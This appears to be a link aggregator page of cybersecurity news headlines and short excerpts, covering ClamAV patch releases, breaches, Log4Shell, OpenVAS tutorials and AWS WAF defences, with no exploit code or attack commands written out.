Today, we are publishing the 1.2.1, 1.1.3, 1.0.4, and 0.103.11 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. Continue reading to learn what changed in each version.1.2.1ClamAV 1.2.1 is a patch release with the following fixes:Eliminate security warning about unused "atty" dependency.GitHub pull request.Upgrade the bundled UnRAR library (libclamunrar) to version 6.2.12.GitHub pull request.Build system: Fix link error with Clang/LLVM/LLD version 17. Patch courtesy of Yasuhiro Kimura.GitHub pull request.Fix alert-exceeds-max feature for files > 2GB and < max-filesize.GitHub pull request. Special thanks to Yasuhiro Kimura for code contributions and bug reports.1.1.3ClamAV...
http://blog.clamav.net/2023/10/clamav-121-113-104-010311-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first. As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon. Update (2025-01-12): Added Lemmy endpoint which has been fixed by now. Also mentioned...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...] The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

[Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

https://malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...] The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...] The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in the Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper , the person who discovered the flaw, the source of the leak is [...] The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principal of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: Reuters The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […] The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […] The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register TCP-IP-co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […] The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 of past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […] The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

US officially warns China is launching cyberattacks to steal coronavirus research
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: CNN The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […] The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of m in cyber-attack
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The Norwegian Investment Fund has been swindled out of m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […] The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […] The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber-attacks hit hospital construction companies
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: BBC Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […] The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […] The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […] The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...] The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...] The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...] The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Is the previous tutorial Vulnerability Scanning with OpenVAS 9.0 part 1 we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...] The post Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...] The post Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Best Hacking Books 2018
One of the most popular and most asked questions since I’ve started this blog is if I can recommend some good hacking books to read for beginners and more experienced hackers and penetration testers. In this article I want to highlight some hacking books and InfoSec books that I personally liked that cover subjects such as ethical hacking, [...] The post The Best Hacking Books 2018 appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/infosec-books/the-best-hacking-books-2018/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)